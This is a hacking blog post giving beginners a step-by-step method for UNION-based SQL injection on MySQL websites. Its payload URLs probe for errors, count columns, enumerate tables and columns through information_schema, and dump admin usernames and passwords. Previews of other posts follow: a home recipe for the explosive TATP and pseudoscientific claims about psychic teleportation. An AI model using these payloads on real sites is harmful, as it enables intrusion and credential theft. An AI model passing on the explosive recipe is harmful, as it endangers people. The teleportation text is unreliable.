Skip to main content

SQL Injection step by step (for Begginers)

SQL Injection step by step (for Begginers)
------------------------------­----------------------------------

SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.

Step 1:
---------
When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
www.site.com/page=1

or
www.site.com/id=5

Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:

www.site.com/page=1'

If the database is vulnerable, the page will spit out a MySQL error such as;

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/­readnews.php on line 29

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.

Step 2:
----------
Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:

www.site.com/page=1 order by 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5--

If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.

Step 3:
---------
We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,
for example:
www.site.com/page=1 union all select 1,2,3,4--

This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.

Step 4:
----------
We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()
or if these dont work try...
@@user
@@version
@@database

For example the url would look like:
www.site.com/page=1 union all select 1,user(),version(),4--

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

Step 5:
----------
In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_sch­ema.tables--

Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.

Step 6:
---------
In this Step we want to list all the column names in the database, to do this we use the following command:

union all select 1,2,group_concat(column_name),4 from information_sch­ema.columns where table_schema=da­tabase()--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.

Step 7:
----------
Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a­,password),4 from admin--

Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website

Labels:

Comments

Post a Comment

Popular posts from this blog

Physical Teleportation Theoretical method to do It!

Teleportation is the ability of moving matter from one point in time and space to another point in time and space instantaneously. There are different types of teleportation available at this time both visual and physical teleportation are possible and we use visual teleportation as our starting point. Types Visual body teleportation Astral body teleportation The different types of visual teleportation are. visual body or astral body teleportation , or visual object teleportation but before we can master teleportation we must first learn the art of Telekinesis/Psychokinesis and Clairsentience and the higher state of consciousness the seventh sense. Other abilities useful in teleportation are Tele-Visualization and ESP (Extrasensory Perception). The ability of teleportation is used in Time travel, Interstellar travel, and Dimensional travel. Teleportation is the near instantaneous transport of the Psychic from one location to another and there is no other fo...
5 comments
....

How to make explosive at home

Hey guys. So I seen a few tutorials on how to make explosives at home. Most of them were pretty long and confusing, dangerous or just stupid. Well this tutorial will show you a very easy way anyone can make explosives, and it's quite stable. What you need: Acetone (C3H6O) Hydrogen Peroxide You can get these from the pharmacy. Mixing these two ingredients in a high temperature will result in Acetone Peroxide. It's not very stable when it's dry, so as long as it's wet it's more stable. This "TATP" got a bit a publicity a couple years ago, in the U.K. Underground bombings, actually. It's dangerous, just like any explosive, so be VERY careful if you plan to make this. And read about it here http://en.wikipedia.org/wiki/Acetone_peroxide I AM NOT RESPONSIBLE FOR ANYTHING YOU DO WITH THIS INFORMATION. THIS IS FOR EDUCATION PURPOSE ONLY.
Post a Comment
....

Trojan blackdoor

What is trojan backdoor ? Backdoor.Trojan is a detection name used by Symantec to identify malicious software programs that share the primary functionality of enabling a remote attacker to have access to or send commands to a compromised computer. As the name suggests, these threats are used to provide a covert channel through which a remote attacker can access and control a computer. The Trojans vary in sophistication, ranging from those that only allow for limited functions to be performed to those that allow almost any action to be carried out, thus allowing the remote attacker to almost completely take over control of a computer. A computer with a sophisticated back door program installed may also be referred to as a "zombie" or a "bot". A network of such bots may often be referred to as a "botnet". Botnets have been well publicized in the news over the years, with different instances being given specific names such as Kraken, Mariposa, or Kneber, alon...
Post a Comment
....